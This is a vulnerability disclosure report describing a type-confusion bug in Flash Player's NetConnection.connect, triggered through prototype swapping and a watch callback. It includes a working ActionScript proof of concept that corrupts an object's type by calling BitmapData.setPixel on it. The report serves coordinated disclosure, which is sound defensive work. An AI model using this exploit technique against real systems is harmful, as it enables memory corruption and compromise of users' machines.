If an object has the type Object but has a NetConnection object as its __proto__, it passes the type checks in NetConnection, so long as the method being called isn't an ASNative method. If NetConnection.connect is called on such an object, it passes this check, but can then call into script when the uri member is set (if there is a watch on uri). If that script calls a constructor on the object, the object is set to a different type (the checks in the constructor pass because it is of type Object), and NetConnection.connect then sets the object's user data to a NetConnection object, leading to type confusion.
A PoC is as follows:
class mysubclass {
    public var uri;

    function mysubclass() {
        this.uri = "test";
        var n = new NetConnection();
        var y;
        // Install a watch on uri so that setting it from native code calls back into script (func)
        this.watch("uri", func);
        var f = n.connect;
        // Make the NetConnection prototype checks pass while the object itself remains of type Object
        this["__proto__"] = n;
        // Call NetConnection.connect with this object as the receiver; setting uri triggers the watch
        f.call(this, y);
        var b = new BitmapData(10, 10, true, 10);
        // The object's user data is now a NetConnection, but it was constructed as a BitmapData
        b.setPixel.call(this, 10, 10, 10);
    }

    // Watch callback, invoked from inside NetConnection.connect when uri is set
    function func(a, b, c) {
        trace("ftop");
        // Swap the prototype so that super() resolves to the BitmapData constructor
        this.__proto__ = {};
        this.__proto__.__constructor__ = flash.display.BitmapData;
        trace("in func");
        // Construct a BitmapData on this object; its type checks pass because the object is of type Object
        super(10, 10, false, 10);
    }
}
This PoC only works on Linux (I think this is due to when GC happens, not to the bug being Linux-specific). A swf is also attached.
This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.